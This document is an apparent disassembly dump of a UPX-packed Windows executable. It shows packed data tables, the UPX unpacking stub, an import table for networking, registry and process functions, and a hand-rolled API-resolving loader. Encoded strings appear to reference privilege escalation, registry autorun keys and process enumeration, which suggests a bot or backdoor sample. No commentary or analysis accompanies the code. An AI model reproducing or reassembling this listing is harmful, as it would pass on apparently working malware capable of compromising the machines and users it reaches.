dd 2CE1FCB7h, 0FCF5CA01h, 0FCF25AFCh, 0FDBFFFE5h, 0F5FCF7EBh
dd 0C7D6ABAAh, 59AAF934h, 2A2A25B4h, 93ACC966h, 0BEB78190h
dd 90FF67F0h, 0C983639Dh, 309271CDh, 513519BFh, 0A95D914h
dd 0FFFF9172h, 712AEC20h, 0A5D2EBC8h, 0E180D512h, 6FAA529Ah
dd 9A2A8D14h, 46FEDFC8h, 8B12B9FBh, 0C3474A9Ah, 0DB9BAB9Eh
dd 0EC20A319h, 0FFDDA26Ch, 0BDFFFDBFh, 0DF9EED85h, 0EB81E8A2h
dd 0C8125544h, 2E961FBDh, 0D812EB8Dh, 125A9A85h, 0FF9A099Dh
dd 5ACD0B09h, 0D096F810h, 7F664922h, 8712FEFDh, 0BB6F6EDBh
dd 95C25AA9h, 82128502h, 0CB5A9104h, 0F9B9CFF7h, 857F4067h
dd 424D53FFh, 0C8531872h, 9CFF4BFh, 62FEFFh, 83435002h
dd 4F575445h, 0E35BED52h, 50204BFFh, 52474F52h, 31204D41h
dd 414C17CDh, 52024D4Eh, 0A6290EBh, 0B71566ABh, 0B75BB696h
dd 0BB676B03h, 330E7075h, 0B61F611Ah, 4D27EB74h, 21583223h
dd 2E323232h, 66D35831h, 2018D62Ah, 5A8B323Ch, 0A433C8C9h
dd 0EC1B0773h, 0C2285DBh, 40023FFh, 20140A11h, 8DDADE05h
dd 69A0D41Ah, 534B4C00h, 4915053h, 97B7887Fh, 4AE00882h
dd 0EDF81773h, 6E240057h, 6F006400h, 3A730075h, 5EDEC874h
dd 901306Ch, 3500398Ch, 0DCC06C23h, 72E1D96h, 32ABDA00h
dd 889CF20h, 3B57DA20h, 9F4C9383h, 46F20003h, 0C1901E23h
dd 40074706h, 0D1060006h, 1046E7FFh, 8A151F01h, 48E088h
dd 8144004Fh, 0FE1BFFFDh, 0F27A6A19h, 281C49E4h, 742530AFh
dd 0E1536710h, 137C853Ch, 3075DF5Ch, 0AEBD0400h, 75CB6B9h
dd 5C085ABDh, 72363761h, 72E4DD7h, 2E380036h, 3B1B3077h
dd 496D899Bh, 0E843EC00h, 0F9633F00h, 640E7900h, 4DC08A2h
dd 6DFF20F6h, 0FF1640h, 0E00DEDEh, 19F1600h, 9BF2602h
dd 28401213h, 0C1110319h, 8B7DC346h, 0D374D96Ch, 0BBE42970h
dd 9C2A9BACh, 0D81D256Bh, 109F6DB3h, 1B04480Eh, 5D6DCF54h
dd 5A5413D7h, 22596326h, 83CBC75Ch, 45B9FF34h, 58765h
dd 4810030Bh, 0C5FFFFB8h, 0EB810DEh, 286A050Bh, 0B10C3919h
dd 0A89B11D0h, 7D4FC000h, 0D9EC7FE1h, 5D5FF52Eh, 1CEB8A88h
dd 0E89F11C9h, 48102B3Ch, 0B22E7C60h, 0F40CD197h, 0CA060A3h
dd 95E43C80h, 0CB10CA0h, 32393BFEh, 880CA000h, 90040h
dd 847B03ECh, 7F927h, 4F401495h, 0BF40707Ch, 6C8A5ECh
dd 13430700h, 88FFC279h, 138578h, 0E9A65BABh, 18F81013h
dd 2FE409CFh, 230EFEFFh
dd 0D45830C1h, 8408BE40h, 7DD3E488h, 10B943D2h, 0B801FFEEh
dd 79366110h, 0AD200CF2h, 9F7F070Dh, 0FF215E5h, 700118D8h
dd 0F900F84h, 0F842579h, 4D000F95h, 206FC9Eh, 6C0F847Fh
dd 84AADE0Fh, 0A89A0087h, 93F436Fh, 1F13C88Ch, 50586E69h
dd 0C0A6DB20h, 7250CAh, 39014446h, 3C844FC9h, 123C6B32h
dd 7B027515h, 413C840Dh, 941C0053h, 1CAFFF01h, 0C606EB22h
dd 73255C5Ch, 6370695Ch, 9BFFF975h, 0EC816624h, 0E4FF071Ch
dd 44655300h, 67756265h, 0FA377669h, 67853518h, 6A6441A7h
dd 6F546175h, 0EC99B6E4h, 176E656Bh, 126F4C73h, 0BF6D7075h
dd 61569FDDh, 4165756Ch, 28704F17h, 7324636Fh, 8D48EA58h
dd 76430034h, 65333F61h, 0E33152A3h, 0F86D4C79h, 0F5056D1Bh
dd 545F1165h, 57796172h, 95D52DB5h, 31431735h, 52521A61h
dd 682DBB9Dh, 6854056Fh, 7356140Ch, 0A35B6B75h, 284158DBh
dd 0A578454Fh, 77336D67h, 47356E3Ah, 121EF3F5h, 48F46897h
dd 7F505454h, 5732203Ch, 0FDEF52B5h, 0D4B4F20h, 9F4B010Ah
dd 6ADF6644h, 4C2D02BBh, 3A2D6704h, 18752520h, 0CA587B5Ah
dd 7954282Fh, 0A66D26B5h, 70A3DAB6h, 15836386h, 8EA9EE2Fh
dd 2DC7025Ah, 42C97293h, 9F56B18Bh, 2B004757h, 0A35B47BAh
dd 0E564F6F4h, 42CB73CBh, 6D8D57FBh, 0A9637673h, 0DA6977CBh
dd 0F1538B77h, 175F3203h, 9A69E775h, 7B5E62Eh, 36373803h
dd 0A6BB2774h, 331F3435h, 32033369h, 0D34B75F2h, 13393031h
dd 0C8383F38h, 370D8320h, 20353607h, 34320C83h, 909A3233h
dd 3031C83Ah, 0F93AF378h, 0CC95ACFFh, 4F53BBD9h, 41575446h
dd 4D5C4552h, 62C1F869h, 6F736F7Bh, 5CBF5CD7h, 72727543h
dd 6B61BC22h, 73DC5615h, 75525C0Ah, 85B79F6Eh, 74231716h
dd 6824D26Fh, 0FF532030h, 1B6850A3h, 673BE3F7h, 7264736Eh
dd 1D93706Ah, 652B79B6h, 51530002h, 6612D86h, 6C0E5F06h
dd 5736264Dh, 5F664B68h, 60C14923h, 34421C28h, 68FF5455h
dd 130BC037h, 5E432053h, 0D5762067h, 0FB95B7B3h, 8058763Bh
dd 0C823B532h, 7C65B05Eh, 0FC471A1Bh, 23596E66h, 79931217h
dd 36346B73h, 4200707Eh, 61BF2063h, 0B7B5B623h, 6D1B1358h
dd 0DD975220h, 0B4B63772h, 0E0440300h, 2F660E20h, 0EE7B25B0h
dd 2AAC6D67h, 5B632463h, 22BFDAE4h, 20797469h, 1E6E614Dh
dd 0AC31B81Ah, 74201501h, 2A2AAE89h, 0FD92BBC4h, 0EC01388Ch
dd 65657246h, 0DBF0060Ch, 470DF923h, 6F4D7465h, 978A5F87h
dd 6B4665E2h, 686D614Eh, 74736C01h, 0C01AEF7Bh, 0A956372h
dd 79706F43h, 70A40A19h, 45A1816Fh, 4E326578h, 7C52FFF6h
dd 6C6F6F54h, 32337067h, 70616E53h, 746F6873h, 4DADDD19h
dd 32129C8Ah, 540F7372h, 14AD7305h, 182C358Fh, 80FB05B6h
dd 78654E21h, 41616974h, 215FFD54h, 0F76451Eh, 7469616Bh
dd 53726F46h, 0B6F6BA21h, 4F7B673Ch, 2C766A62h, 0D9B9E144h
dd 8D225AC3h, 3A0B6972h, 0BFBDEC97h, 486573C8h, 0C646E61h
dd 0C25E2447h, 8B6C3BDh, 5A61D26Eh, 0B5CDB3F0h, 0A3449711h
dd 14796456h, 0B6DF75BBh, 2B61984Ch, 6F666E49h, 6509530Fh
dd 37800670h, 9C496218h, 64656B26h, 64D98845h, 6EB328B3h
dd 92E7FB36h, 12E0D0CDh, 6464410Bh, 0F7B30F72h, 4C0B111Dh
dd 61726269h, 0E68AB567h, 4D2B60DAh, 36137C82h, 0D5CB080Bh
dd 0C363CF8Eh, 547B42DAh, 75888169h, 4915DE65h, 0E94D8AD8h
dd 1BDA3478h, 0DD29B36h, 0F239C45Dh, 4F116610h, 78455A62h
dd 0B3612DB6h, 630ADF31h, 9B9E6D13h, 522DC6E0h, 87B591Bh
dd 1766C0E0h, 38657A86h, 0A3604CA7h, 451585B5h, 0D160C3FCh
dd 33759F9Dh, 0A1673A2Bh, 4579654Bh, 0CE40EC3Bh, 0FC18610h
dd 5EC00A51h, 11F65AC2h, 5987309Eh, 21E7426Ch, 841CE010h
dd 0C517B76h, 0BE6E6241h, 0E2B6853h, 310428A5h, 1AC13F86h
dd 3677D985h, 62BB1089h, 440A7DB6h, 720E6112h, 0D61B6669h
dd 0CA79B63Ah, 2B758F67h, 616F6C36h, 6FCE436Fh, 6F112C79h
dd 67702350h, 0E8F5210h, 38F63F90h, 4114B4D0h, 69757163h
dd 74AE7072h, 35494DD8h, 0C3363AA0h, 0DE1359A7h, 0CA7273ECh
dd 18B16D06h, 35B2D1CEh, 150F920Eh, 536B99DAh, 445F1D4Dh
dd 740AC558h, 685F3FB8h, 3627F9F6h, 2CC46DBh, 4F727907h
dd 880110E9h, 9160AD15h, 1CC2D22h, 271DCD34h, 61150E65h
dd 14362CC2h, 0BBB4E70Ah, 4906EE15h, 70737766h, 4166B105h
dd 9C62834Fh, 424F466h, 0DB616C5Ah, 9B558543h, 370E1141h
dd 6705212Ch, 1B866B14h, 6E0306A6h, 74534349h, 8C950E81h
dd 0D471A65h, 0A8EDB2CBh, 273FFA1h, 2C010D02h, 392CB2CBh
dd 0C17346Fh, 0B2CB2CB2h, 10130409h, 4F45AA16h, 455036AAh
dd 0E4FFB60Eh, 59C896B7h, 0E00040D8h, 0B010F00h, 260C0601h
dd 68011CB2h, 2334DC12h, 0C6A32510h, 0B31420Eh, 0B7334A02h
dd 0C079BA4h, 39341E60h, 10B0364Bh, 2D570607h, 6210805Dh
dd 7C64098Ch, 0B0AE3145h, 6A2E1E01h, 0B60D8180h, 269024A6h
dd 7C7B64C4h, 0E0049F90h, 0FBE1642Eh, 0D85BA114h, 272A0737h
dd 48C016h, 81434BE0h, 54C32Fh, 2 dup(0)
db 90h
db 0FFh, 2 dup(0)
align 10h
pusha
mov esi, offset dword_31426000
lea edi, [esi-5000h]
push edi
or ebp, 0FFFFFFFFh
jmp short loc_31427BD2
; ---------------------------------------------------------------------------
align 8
loc_31427BC8: ; CODE XREF: UPX1:loc_31427BD9�j
mov al, [esi]
inc esi
mov [edi], al
inc edi
loc_31427BCE: ; CODE XREF: UPX1:31427C66�j
; UPX1:31427C7D�j
add ebx, ebx
jnz short loc_31427BD9
loc_31427BD2: ; CODE XREF: UPX1:31427BC0�j
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
loc_31427BD9: ; CODE XREF: UPX1:31427BD0�j
jb short loc_31427BC8
mov eax, 1
loc_31427BE0: ; CODE XREF: UPX1:31427BEF�j
; UPX1:31427BFA�j
add ebx, ebx
jnz short loc_31427BEB
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
loc_31427BEB: ; CODE XREF: UPX1:31427BE2�j
adc eax, eax
add ebx, ebx
jnb short loc_31427BE0
jnz short loc_31427BFC
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
jnb short loc_31427BE0
loc_31427BFC: ; CODE XREF: UPX1:31427BF1�j
xor ecx, ecx
sub eax, 3
jb short loc_31427C10
shl eax, 8
mov al, [esi]
inc esi
xor eax, 0FFFFFFFFh
jz short loc_31427C82
mov ebp, eax
loc_31427C10: ; CODE XREF: UPX1:31427C01�j
add ebx, ebx
jnz short loc_31427C1B
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
loc_31427C1B: ; CODE XREF: UPX1:31427C12�j
adc ecx, ecx
add ebx, ebx
jnz short loc_31427C28
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
loc_31427C28: ; CODE XREF: UPX1:31427C1F�j
adc ecx, ecx
jnz short loc_31427C4C
inc ecx
loc_31427C2D: ; CODE XREF: UPX1:31427C3C�j
; UPX1:31427C47�j
add ebx, ebx
jnz short loc_31427C38
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
loc_31427C38: ; CODE XREF: UPX1:31427C2F�j
adc ecx, ecx
add ebx, ebx
jnb short loc_31427C2D
jnz short loc_31427C49
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
jnb short loc_31427C2D
loc_31427C49: ; CODE XREF: UPX1:31427C3E�j
add ecx, 2
loc_31427C4C: ; CODE XREF: UPX1:31427C2A�j
cmp ebp, 0FFFFF300h
adc ecx, 1
lea edx, [edi+ebp]
cmp ebp, 0FFFFFFFCh
jbe short loc_31427C6C
loc_31427C5D: ; CODE XREF: UPX1:31427C64�j
mov al, [edx]
inc edx
mov [edi], al
inc edi
dec ecx
jnz short loc_31427C5D
jmp loc_31427BCE
; ---------------------------------------------------------------------------
align 4
loc_31427C6C: ; CODE XREF: UPX1:31427C5B�j
; UPX1:31427C79�j
mov eax, [edx]
add edx, 4
mov [edi], eax
add edi, 4
sub ecx, 4
ja short loc_31427C6C
add edi, ecx
jmp loc_31427BCE
; ---------------------------------------------------------------------------
loc_31427C82: ; CODE XREF: UPX1:31427C0C�j
pop esi
mov edi, esi
mov ecx, 7Eh
loc_31427C8A: ; CODE XREF: UPX1:31427C91�j
; UPX1:31427C96�j
mov al, [edi]
inc edi
sub al, 0E8h
loc_31427C8F: ; CODE XREF: UPX1:31427CB4�j
cmp al, 1
ja short loc_31427C8A
cmp byte ptr [edi], 1
jnz short loc_31427C8A
mov eax, [edi]
mov bl, [edi+4]
shr ax, 8
rol eax, 10h
xchg al, ah
sub eax, edi
sub bl, 0E8h
add eax, esi
mov [edi], eax
add edi, 5
mov eax, ebx
loop loc_31427C8F
lea edi, [esi+5000h]
loc_31427CBC: ; CODE XREF: UPX1:31427CDE�j
mov eax, [edi]
or eax, eax
jz short loc_31427D07
mov ebx, [edi+4]
lea eax, [eax+esi+7000h]
add ebx, esi
push eax
add edi, 8
call dword ptr [esi+708Ch]
xchg eax, ebp
loc_31427CD9: ; CODE XREF: UPX1:31427CFF�j
mov al, [edi]
inc edi
or al, al
jz short loc_31427CBC
mov ecx, edi
jns short near ptr loc_31427CEA+1
movzx eax, word ptr [edi]
inc edi
push eax
inc edi
loc_31427CEA: ; CODE XREF: UPX1:31427CE2�j
mov ecx, 0AEF24857h
push ebp
call dword ptr [esi+7090h]
or eax, eax
jz short loc_31427D01
mov [ebx], eax
add ebx, 4
jmp short loc_31427CD9
; ---------------------------------------------------------------------------
loc_31427D01: ; CODE XREF: UPX1:31427CF8�j
call dword ptr [esi+7094h]
loc_31427D07: ; CODE XREF: UPX1:31427CC0�j
popa
jmp loc_31422334
; ---------------------------------------------------------------------------
align 400h
UPX1 ends
; Section 3. (virtual address 00008000)
; Virtual size : 0001C000 ( 114688.)
; Section size in file : 0001C000 ( 114688.)
; Offset to raw data for section: 00008000
; Flags E0000060: Text Data Executable Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure code
; Segment permissions: Read/Write/Execute
UPX2 segment para public 'CODE' use32
assume cs:UPX2
;org 31428000h
assume es:nothing, ss:nothing, ds:UPX0, fs:nothing, gs:nothing
dd 3 dup(0)
dd 80C4h, 808Ch, 3 dup(0)
dd 80D1h, 809Ch, 3 dup(0)
dd 80DEh, 80A4h, 3 dup(0)
dd 80E9h, 80ACh, 3 dup(0)
dd 80F4h, 80B4h, 3 dup(0)
dd 8100h, 80BCh, 5 dup(0)
dword_3142808C dd 7C801D77h ; resolved to->KERNEL32.LoadLibraryA ; sub_31432C1B+49�r
dd 7C80ADA0h, 7C81CDDAh, 0
dd 77DD6BF0h, 0
dd 77C371D3h, 0
dd 7E41A8ADh, 0
dd 42C2C8A1h, 0
dd 71AB9639h, 0
dd 4E52454Bh, 32334C45h, 4C4C442Eh, 56444100h, 33495041h
dd 6C642E32h, 534D006Ch, 54524356h, 6C6C642Eh, 45535500h
dd 2E323352h, 6C6C64h, 494E4957h, 2E54454Eh, 6C6C64h, 5F325357h
dd 642E3233h, 6C6Ch, 64616F4Ch, 7262694Ch, 41797261h, 65470000h
dd 6F725074h, 64644163h, 73736572h, 78450000h, 72507469h
dd 7365636Fh, 73h, 43676552h, 65736F6Ch, 79654Bh, 61720000h
dd 646Eh, 72707377h, 66746E69h, 41h, 65746E49h, 74656E72h
dd 6E65704Fh, 41h, 26h dup(0)
dd 1C39068h, 0FFC48BEDh, 0E85B93D0h, 59h, 824648Bh, 4EBB8h
dd 64FAEB00h, 18A167h, 0F30408Bh, 830240B6h, 3C7500F8h
dd 0E8h, 0ED815D00h, 402334h, 237B858Bh, 85030040h, 402383h
dd 858BF08Bh, 40237Fh, 23838503h, 8B500040h, 0ACC933FEh
dd 238B8532h, 41AA0040h, 23878D3Bh, 0EF7C0040h, 64C02BC3h
dd 896430FFh, 5678B820h, 3871234h, 6000h, 7BB0h, 31420000h
dd 1E00h, 0E89078h, 8B000000h, 80F72404h, 242Bh, 80000000h
dd 29AC9889h, 5C8B0000h, 2D740424h, 0B08959FCh, 29B0h
dd 29B4B889h, 0B8800000h, 242Fh, 30D75E8h, 243098h, 25B8B00h
dd 8EB33FFh, 2431988Bh, 33FF0000h, 8195555Bh, 8F04246Ch
dd 81000000h, 0FFF000E3h, 6ED81FFh, 8B004010h, 8D04247Ch
dd 40343CB5h, 2BB900h, 0A4F30000h, 544E7B81h, 75736968h
dd 3C438B0Dh, 6618048Dh, 45503881h, 0EB810874h, 100h, 508BE275h
dd 8BD30378h, 4A8B2072h, 51F30318h, 81C303ADh, 4700FF78h
dd 1B757465h, 50037881h, 75636F72h, 7788112h, 72646441h
dd 78810975h, 7373650Bh, 0E2057400h, 0C35D59D7h, 8B240C29h
dd 3592472h, 4B70FF3h, 1C7A8B4Eh, 348BFB03h, 0E8F30387h
dd 0Ch, 736F6C43h, 6E614865h, 656C64h, 89D6FF53h, 40353C85h
dd 0DE800h, 72430000h, 65746165h, 6E657645h, 53004174h
dd 8589D6FFh, 403540h, 0DE8h, 74654700h, 7473614Ch, 6F727245h
dd 0FF530072h, 448589D6h, 0E8004035h, 70h, 2174C085h, 4495FF50h
dd 85004035h, 8D1075C0h, 4011D285h, 0FF508A00h, 6EE8h
dd 0FF7CEB00h, 40353C95h, 3185F700h, 4034h, 74800000h
dd 35B58D1Eh, 8B004034h, 0A404247Ch, 0B29D8BA5h, 8B004039h
dd 4039B6B5h, 0BABD8B00h, 5D004039h, 6A5AC3h, 6A006Ah
dd 168006Ah, 8B000400h, 50006AC4h, 0C48B0C6Ah, 5456E2FFh
dd 335Fh, 0DAE8C933h, 8DFFFFFFh, 4011A195h, 51515200h
dd 4095FF50h, 83004035h, 8AC320C4h, 225FB9F2h, 10300000h
dd 0E2D60240h, 0B88C3F9h, 0E83518B5h, 6DC3B830h, 0E820CDD4h
dd 80257B70h, 28A05885h, 7CF1BD3Bh, 0A1D35890h, 0A8B1799Ah
dd 915E1D9Fh, 1A73B870h, 7A6F3081h, 0B6238B2h, 11DE8D91h
dd 0A62238F0h, 6B659E87h, 890038E3h, 9D682D99h, 7DCDB870h
dd 0E820CDEBh, 0B50D3143h, 28E02DC8h, 16282601h, 37E058D3h
dd 0BD94ED0Fh, 40E19850h, 1CC4B72Fh, 6360D850h, 48EAEC37h
dd 28C8DB93h, 0C1C838A0h, 28D50855h, 0E1CE10F0h, 0A84A9810h
dd 0FD882DCFh, 28E5D810h, 0F6717C7Fh, 0A537E76Fh, 8D03805h
dd 0D10FD3D0h, 88007284h, 0B8207591h, 5DCDB870h, 0E820CAD3h
dd 0EA7F5D83h, 0A380F413h, 7BC8524Ch, 0FD6D0110h, 884062CDh
dd 54AB33E3h, 3650EFB9h, 8037C417h, 881F873h, 1DF08D6Fh
dd 8C4338F0h, 6720DDF0h, 77FEDA74h, 0A84A0FEFh, 0C828B95Ah
dd 80E0D854h, 881F870h, 1DF08D6Fh, 884538F0h, 9665DCDFh
dd 886A870Fh, 0A820F040h, 0C82AB834h, 0BF6C3091h, 60D0F91Ah
dd 28A11891h, 7D90AD4Fh, 62885890h, 770079F0h, 0E815C885h
dd 0C8455030h, 0BC89D850h, 627F078Eh, 22434190h, 0DD3F32DAh
dd 68A06D6Ch, 0BC3891Bh, 0E815E8ADh, 4C4FB830h, 179F2667h
dd 880FE98h, 6CF45690h, 0B7C074FCh, 28D5D045h, 0FBB5F5F0h
dd 9B20D807h, 18FD35F9h, 59609865h, 4E686B7Bh, 0ABA01892h
dd 8F5C00Dh, 0ECEF58D0h, 77FF86F3h, 9DF41D9Bh, 0B8BFB870h
dd 7DE55751h, 8380B843h, 6895F015h, 49B0C7B0h, 5B02DD5Fh
dd 0D8B78B0h, 0A860ADC8h, 4741C8CFh, 0A85331D5h, 0D40D7370h
dd 0CBA058A5h, 49B1C7B9h, 5B16DD5Fh, 7AE878B0h, 25DF67EDh
dd 8876F68Dh, 82AF5350h, 0F7590E70h, 0C9231CE0h, 4B8052B3h
dd 688A0F29h, 3D8D609Ah, 0A8608D8Fh, 0C840A489h, 65B45350h
dd 0F77EB574h, 83C6E76Fh, 488D3C3Dh, 0EE058D0h, 8C47F55Bh
dd 4C4AABBh, 33A21356h, 2608D83Ah, 8380F819h, 0A3A0725Ch
dd 20C05274h, 60E058D0h, 0DA51389Ah, 5770967Ah, 887558A5h
dd 2CE38050h, 614E9030h, 0FC2B1890h, 844B38DAh, 688A18BAh
dd 0E2527A9Ah, 0C1EEF010h, 0C82AB830h, 0B89FB201h, 3D646D8Fh
dd 71FF18D0h, 0CCCFC735h, 971FA5F7h, 9800CD7Dh, 0DC999850h
dd 4340B83Ah, 69C52BBFh, 4890F89Dh, 64259590h, 0B7C078A4h
dd 8875D530h, 0DA0038E8h, 9DBC0DEFh, 0DEA8B870h, 0A460D850h
dd 7DEB971Fh, 41D248E0h, 2DAC51C6h, 9B63DB7h, 0C9650D9Ch
dd 3DDFC810h, 0C8008D78h, 0DD2C5DD9h, 5CD0F830h, 0D7CA38FAh
dd 7D2CAD4Fh, 0A8655890h, 1E3F0DAFh, 0FE769A7Ah, 0C92A6CBBh
dd 0E8713002h, 6DD3F870h, 5DC27DD4h, 21B268D7h, 0D8C31A6h
dd 0DE001D97h, 9D6C0DEFh, 0CCBB870h, 0B8368E06h, 9D7FAF26h
dd 28E02D40h, 1FD0FC33h, 5DDCCD2Fh, 886A78B0h, 3DDF9A7Ah
dd 0C8008D40h, 0E861F0E9h, 0E9AB6F70h, 7C841419h, 0E455C7E7h
dd 5BE018E5h, 0B4A5FB06h, 0A820D826h, 5DBFEF64h, 0E820EDE0h
dd 54F438F5h, 2C5E9BD6h, 3C3FD6C2h, 688A50F4h, 1DFF529Ah
dd 0A860ADB8h, 143478B5h, 0EC5D30C3h, 0C1B3F870h, 1190FB01h
dd 8F60435h, 0E9C82DD0h, 880DD631h, 0F874C810h, 9810E966h
dd 80F52703h, 8D80B845h, 27D44150h, 40E44C4Fh, 5EDCDD5Fh
dd 24E878B0h, 0FBDF67EDh, 0FD7C2DCFh, 708BD810h, 9A83CF1h
dd 0D7F71890h, 8F50425h, 9305B1D0h, 0C18D870Fh, 0F078C010h
dd 0C8697630h, 0E86DBD50h, 880F970h, 28A01890h, 48C038B0h
dd 3BB609D0h, 0BD48ED0Fh, 0F18B9850h, 0BD803C9Ch, 2B8E3AABh
dd 7BE1BA2Ch, 45C156F5h, 2A8F5CD5h, 1C833DBAh, 0BB572483h
dd 0C176C722h, 0C835CC42h, 9A14AB3Ch, 8EE9D1Ch, 49C56AD3h
dd 21865DC4h, 68A13DBCh, 0E9650AB3h, 0C166FD64h, 0A90DDD5Ch
dd 8609A820h, 4B80B917h, 5CC17DE2h, 27B268D5h, 1B933DB3h
dd 0FA4378B1h, 0CD54F975h, 0A72DDD62h, 8034BD24h, 6CE19D02h
dd 4DD25B90h, 1CA54CD1h, 9852AB8h, 0FA437894h, 0CD54F975h
dd 0A42FD764h, 980CBD38h, 66D3CA43h, 40D368F1h, 0DC04CDFh
dd 3C9431A8h, 0E9650A98h, 0C1669874h, 0A114DD5Ch, 8734BD3Dh
dd 7CF38123h, 41F475F5h, 0FC05DDDh, 1A62CB5h, 0FC411D9Ch
dd 0CA49EA64h, 0BB25CC45h, 8D27D811h, 64E9BE04h, 52C94BF5h
dd 2D8738D5h, 4891EA4h, 0E5692C95h, 0CD679875h, 0AC2FF544h
dd 0A005B425h, 64E49611h, 6FA059F5h, 2D944CD5h, 1A628BDh
dd 0E94E1D9Ch, 0A861FD7Dh, 9C34DD77h, 0B810B535h, 49E88C11h
dd 5CC55F90h, 3BB25DE6h, 688E37B9h, 0DE741DB7h, 0C153EA75h
dd 0B005D65Fh, 872CD811h, 61CC9C11h, 5AC16AF2h, 5C079C9h
dd 1B628B1h, 0EE4F0F95h, 0CD4CF156h, 0AD30F730h, 84099E3Eh
dd 78E1B515h, 4FCE71E0h, 388F38F1h, 1AB036B5h, 0FB651B9Fh
dd 0DA709863h, 0BB25DB5Fh, 0AE52EB23h, 7CF38A19h, 47D24890h
dd 3BB35DD3h, 0DAE6AE3h, 0DB000C88h, 0C166EC75h, 0BC01DD5Ch
dd 8A09AA24h, 7BE58C05h, 4DF318D1h, 24A97EC4h, 5890CB5h
dd 0E4537895h, 0A850FD75h, 0BC33C163h, 8134B535h, 67D49D1Dh
dd 4DCC71D6h, 2DAD51E4h, 58E0DD0h, 0E1560891h, 0CE6FEF75h
dd 0AD2CD176h, 9A098E50h, 64E18D04h, 47CC74D1h, 3A9738D3h
dd 2E852CB9h, 88651499h, 0CC61EC5Eh
dd 0BC33CD5Ah, 9E09AA00h, 6FE59419h, 47F46BF5h, 48AE5DDBh
dd 1AA32C9Eh, 0ED741995h, 0CD4CF156h, 8B34F630h, 9C01BD22h
dd 67F2A815h, 5BD37DF3h, 0BB476B0h, 1C813DA2h, 0E7722895h
dd 0DB53FD73h, 8640C075h, 8D129B24h, 5BE58C11h, 41D47BF5h
dd 6C056DFh, 188115A4h, 0FF6511A6h, 0CD73FE5Fh, 0A729CC53h
dd 9C2ED83Eh, 66E5883Fh, 4DCC71D6h, 7B476B0h, 388E3DA0h
dd 0ED631782h, 0C774EB63h, 0C82EDD5Bh, 9A30AC1Eh, 6BE58C1Fh
dd 5AC94EE4h, 24A14DC4h, 78D3D9Dh, 0C6000182h, 0C152CF64h
dd 0A116DD44h, 8915AC22h, 65E5B51Ch, 28D96AFFh, 1DAC4CE2h
dd 78331BEh, 0FC531D94h, 0CF4EF162h, 0A601D764h, 9C33B123h
dd 6FEE9102h, 69F34F90h, 3AA14CE3h, 68902DA4h, 0FB6F1493h
dd 0CB4FEB75h, 0C834DD5Bh, 860EB733h, 8F49B15h, 40D47DF7h
dd 2AB44BDFh, 58136A9h, 0ED727895h, 0DB20EE73h, 0C824D655h
dd 8303B723h, 41808C15h, 5AC56CFEh, 0BB45DDEh, 0D9337BCh
dd 0EC6E19B8h, 0E120FD7Ch, 0BA25CC5Eh, 0AF14BD3Eh, 67C38C15h
dd 4BC576FEh, 1BA45DC4h, 0D9439A4h, 0FC6E31F0h, 0CD4EEA75h
dd 0AD30F744h, 0A160993Eh, 7AE58C1Eh, 67D47DFEh, 1DAE5DC0h
dd 68A134A2h, 0ED7416B9h, 0DC45F662h, 0AC21DD62h, 8D0CB116h
dd 5EC4B970h, 1BE948D1h, 4841682h, 0DB2589Ch, 0E76C3B97h
dd 0CD6BFD63h, 0AD12B849h, 8D109737h, 71E5B31Eh, 28E160D5h
dd 19A75DE2h, 11923DA5h, 0FD6C19A6h, 0E958DD75h, 0AF25EA30h
dd 0BE14BD03h, 6DF59411h, 28E160D5h, 63C5D133h, 68880918h
dd 5E878F0h, 0C223BC5Ch, 9945D230h, 0ED0A8B00h, 83D034FBh
dd 42F44844h, 1B9269F0h, 5D10CD2Fh, 4C8378B0h, 5CB5671Ch
dd 4B40F805h, 0BFA3D094h, 1D317DFDh, 0D79318D0h, 22C052E0h
dd 0CC75A7DEh, 0D0038C5h, 38A497D0h, 9840B830h, 0E8091638h
dd 62547370h, 426C9390h, 48C050F0h, 6A8A58C0h, 0E00012A2h
dd 0A820F1DEh, 9B11B85Ah, 0CF52700h, 5780B845h, 1435E7C9h
dd 0CDC07885h, 0E3BC2C2Fh, 0C815F07Dh, 252C7B10h, 8850B8A5h
dd 0BFB1DB50h, 83520723h, 6895CC15h, 0DC4FB5B0h, 80E058F3h
dd 77FF87A4h, 9DC81D9Bh, 47CDB870h, 0E860FBB1h, 0F77FBB98h
dd 0F025936Fh, 0C5C07885h, 68C3B05Fh, 773290F0h, 2DAB67EFh
dd 0C8008DECh, 0E31418D5h, 2B7577FDh, 35481890h, 0C33FC74Fh
dd 3D230717h, 88007818h, 45A1C510h, 0C800A224h, 6DED1163h
dd 8C0E5DEh, 79F14CC1h, 0B79169E0h, 28D53445h, 0AC04FFF0h
dd 9D1C0DEFh, 0A1DB870h, 35D854h, 880F870h, 6B4D99CDh
dd 22C078AAh, 6675D52Fh, 0D80038EAh, 8C005542h, 4B409230h
dd 2F06D494h, 489AACF5h, 0EF80D590h, 8DA6E35h, 42E07CD0h
dd 0E2C325F0h, 5721F211h, 0CC334703h, 28E5CDAFh, 3E80804h
dd 0A3A01890h, 18C36360h, 1A55D5ECh, 30038EAh, 0A82194AAh
dd 0C0CA3330h, 0EB60D851h, 684BD388h, 8E53D31Bh, 0FC54CD1h
dd 0AA0BAD32h, 0DF0FBF73h, 23734C9Bh, 0A214E8FCh, 82328910h
dd 0F815078Fh, 0ABA058A5h, 0DD4B3474h, 68A06DA4h, 6283AFDBh
dd 0C2275F17h, 41405030h, 82A3DB07h, 168A06Ah, 0A5A01890h
dd 0B66A59F2h, 0AB102D19h, 0BE46ED99h, 2C259850h, 4102B038h
dd 0A8569EC5h, 0CB620F70h, 28A0F0C5h, 0C99D38B0h, 28FB513Dh
dd 0C29DF3F0h, 2B20D826h, 0C8489C4Ch, 0E8D95C5Fh, 0E401F870h
dd 28A01A98h, 49C450E4h, 0FD1F58D0h, 88404D60h, 2CAD649Bh
dd 0C841BC14h, 0E80A8850h, 880FC98h, 7CF24E90h, 0DD3F6FB0h
dd 68A06D5Ch, 1F8DB1C3h, 0A8209914h, 0CA2AE961h, 8061B201h
